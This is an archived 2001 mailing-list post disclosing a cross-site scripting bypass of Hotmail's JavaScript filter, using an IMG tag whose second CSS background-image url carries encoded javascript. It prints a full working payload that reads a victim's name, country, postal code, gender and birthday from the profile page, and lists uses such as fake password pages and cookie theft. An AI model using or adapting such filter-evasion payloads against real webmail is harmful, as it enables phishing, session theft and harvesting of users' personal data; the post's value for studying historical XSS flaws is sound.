hotmail javascript bypass

From: ObLiviON (oblivat_private)
Date: Sat Oct 20 2001 - 06:53:37 PDT

Next message: Aycan Irican: "KEYWORDS: shared objects, dynamic linking,"

Previous message: Aycan Irican: "KEYWORDS: shared objects, dynamic linking,"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

You can bypass the hotmail javascript filtering system using the
<img>..</img> tag.

Placing an <img src="javascript:bla" style="image-background:
url('javascript: bla'); image-background:
url('javascript:alert%28test%29')">

The src="javascript:bla" is changed to src="javascript:Filtered()".
The first image-background: url('javascript:bla') is changed to
image-background: url(non-'javascript:bla') (so isn't executed).

But here is the problem the second image-backgroun:
url('javascript:alert%28test%29') isn't changed at all.
(the %28/%29 are used instead of '(' / ')' else it won't work..)

So this code will be executed.

Some things you can do with this bug:

1 redirect people to a fake hotmail-retype-your-password page and catch
their password.
2 Catching cookies/urls etc.

3 You can get the users personal information
Example:
- I used netscape messenger and inserted this html tag:

--
<IMG src="javascript:bla"
style="background-image:url('javascript:alert%28%27bli%27%29');
background-image:url('javascript:document.all[61].src=document.location.href.replace%28%22getmsg%22,%22person%22%29.substring%28%220%22,document.location.href.indexOf%28%22%26msg%22%29%29;function
bla() { alert%28%22Name=%22 + window.frames[0].personalinfo.xfname.value
+ %22%20%22 + window.frames[0].personalinfo.xlname.value +
%22\nCountry=%22 +
window.frames[0].personalinfo.xcountry[window.frames[0].personalinfo.xcountry.selectedIndex].text
+ %22\nProvince=%22 +
window.frames[0].personalinfo.xgeoid[window.frames[0].personalinfo.xgeoid.selectedIndex].text
+ %22\nPostalcode=%22 + window.frames[0].personalinfo.xzip.value +
%22\nMale=%22 + window.frames[0].personalinfo.xgender[0].checked +
%22\nFemale=%22 + window.frames[0].personalinfo.xgender[1].checked +
%22\nBirthday=%22 + window.frames[0].personalinfo.day.value + %22%20%22
+
window.frames[0].personalinfo.month[window.frames[0].personalinfo.month.selectedIndex].text%29;
};setTimeout%28%27bla()%27,4000%29;')">
--

Then sending an email, and if the user opens this email a message will
popup containing his full name, country etc. So you are able to catch
this info.

4 .....

ObLiviON

Next message: Aycan Irican: "KEYWORDS: shared objects, dynamic linking,"
Previous message: Aycan Irican: "KEYWORDS: shared objects, dynamic linking,"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Oct 20 2001 - 11:05:08 PDT